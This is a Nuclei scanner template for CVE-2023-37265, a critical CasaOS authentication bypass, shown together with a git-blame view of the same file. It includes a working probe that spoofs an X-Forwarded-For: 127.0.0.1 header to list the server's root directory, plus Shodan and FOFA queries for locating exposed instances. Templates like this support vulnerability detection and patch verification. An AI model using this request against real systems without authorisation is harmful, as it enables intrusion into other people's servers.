nuclei-templates/http/cves/2023/CVE-2023-37265.yaml

id: CVE-2023-37265

info:
  name: CasaOS  < 0.4.4 - Authentication Bypass via Internal IP
  author: iamnoooob,DhiyaneshDK,pdresearch
  severity: critical
  description: |
    CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.
  remediation: The problem was addressed by improving the detection of client IP addresses in 391dd7f. This patch is part of CasaOS 0.4.4.
  reference:
    - https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad
    - https://github.com/IceWhaleTech/CasaOS/security/advisories/GHSA-m5q5-8mfw-p2hr
    - https://github.com/IceWhaleTech/CasaOS-Gateway/commit/391dd7f0f239020c46bf057cfa25f82031fc15f7
    - https://github.com/IceWhaleTech/CasaOS-Gateway/security/advisories/GHSA-vjh7-5r6x-xh6g
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37265
    cwe-id: CWE-306
    epss-score: 0.10511
    epss-percentile: 0.94441
    cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: icewhale
    product: casaos
    shodan-query: http.html:"/CasaOS-UI/public/index.html"
    fofa-query: body="/CasaOS-UI/public/index.html"
  tags: cve,cve2023,oss,casaos,jwt,icewhale

http:
  - method: GET
    path:
      - "{{BaseURL}}/v1/folder?path=%2F"

    headers:
      X-Forwarded-For: 127.0.0.1
    matchers:
      - type: word
        words:
          - '"success":200'
          - '"message":"ok"'
          - 'content'
          - 'is_dir'
        condition: and

    extractors:
      - type: json
        json:
          - .data.content[].path
# digest: 4a0a0047304502205dca1eb79fc44f7d37d76c65fb6fc79bf2ae451e6871cc879109764320765a3c022100a767dcff845205b4459f92f8792ad85d281d74cad267fcc7306d38608ab7576a:922c64590222798bb761d5b6d8e72950
CasaOS Authentication Bypass (CVE-2023-37265, CVE-2023-37266) (#7766) * Create CVE-2023-37265.yaml * Create CVE-2023-37266.yaml 2023-07-27 09:11:18 +00:00			`id: CVE-2023-37265`

			`info:`
			`name: CasaOS < 0.4.4 - Authentication Bypass via Internal IP`
			`author: iamnoooob,DhiyaneshDK,pdresearch`
			`severity: critical`
			`description: \|`
			CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`remediation: The problem was addressed by improving the detection of client IP addresses in 391dd7f. This patch is part of CasaOS 0.4.4.`
CasaOS Authentication Bypass (CVE-2023-37265, CVE-2023-37266) (#7766) * Create CVE-2023-37265.yaml * Create CVE-2023-37266.yaml 2023-07-27 09:11:18 +00:00			`reference:`
			`- https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad`
			`- https://github.com/IceWhaleTech/CasaOS/security/advisories/GHSA-m5q5-8mfw-p2hr`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`- https://github.com/IceWhaleTech/CasaOS-Gateway/commit/391dd7f0f239020c46bf057cfa25f82031fc15f7`
			`- https://github.com/IceWhaleTech/CasaOS-Gateway/security/advisories/GHSA-vjh7-5r6x-xh6g`
CasaOS Authentication Bypass (CVE-2023-37265, CVE-2023-37266) (#7766) * Create CVE-2023-37265.yaml * Create CVE-2023-37266.yaml 2023-07-27 09:11:18 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cve-id: CVE-2023-37265`
CasaOS Authentication Bypass (CVE-2023-37265, CVE-2023-37266) (#7766) * Create CVE-2023-37265.yaml * Create CVE-2023-37266.yaml 2023-07-27 09:11:18 +00:00			`cwe-id: CWE-306`
TemplateMan Update [Wed Nov 1 14:45:21 UTC 2023] :robot: 2023-11-01 14:45:21 +00:00			`epss-score: 0.10511`
TemplateMan Update [Tue Dec 12 11:07:51 UTC 2023] :robot: 2023-12-12 11:07:52 +00:00			`epss-percentile: 0.94441`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`cpe: cpe:2.3:o:icewhale:casaos::::::::`
CasaOS Authentication Bypass (CVE-2023-37265, CVE-2023-37266) (#7766) * Create CVE-2023-37265.yaml * Create CVE-2023-37266.yaml 2023-07-27 09:11:18 +00:00			`metadata:`
			`verified: true`
			`max-request: 1`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: icewhale`
			`product: casaos`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`shodan-query: http.html:"/CasaOS-UI/public/index.html"`
			`fofa-query: body="/CasaOS-UI/public/index.html"`
tags enhancements 2023-12-05 09:50:33 +00:00			`tags: cve,cve2023,oss,casaos,jwt,icewhale`
CasaOS Authentication Bypass (CVE-2023-37265, CVE-2023-37266) (#7766) * Create CVE-2023-37265.yaml * Create CVE-2023-37266.yaml 2023-07-27 09:11:18 +00:00
			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/v1/folder?path=%2F"`

			`headers:`
			`X-Forwarded-For: 127.0.0.1`
			`matchers:`
			`- type: word`
			`words:`
			`- '"success":200'`
			`- '"message":"ok"'`
			`- 'content'`
			`- 'is_dir'`
			`condition: and`

			`extractors:`
			`- type: json`
			`json:`
			`- .data.content[].path`
Auto Template Signing [Tue Dec 12 12:02:03 UTC 2023] :robot: 2023-12-12 12:02:03 +00:00			`# digest: 4a0a0047304502205dca1eb79fc44f7d37d76c65fb6fc79bf2ae451e6871cc879109764320765a3c022100a767dcff845205b4459f92f8792ad85d281d74cad267fcc7306d38608ab7576a:922c64590222798bb761d5b6d8e72950`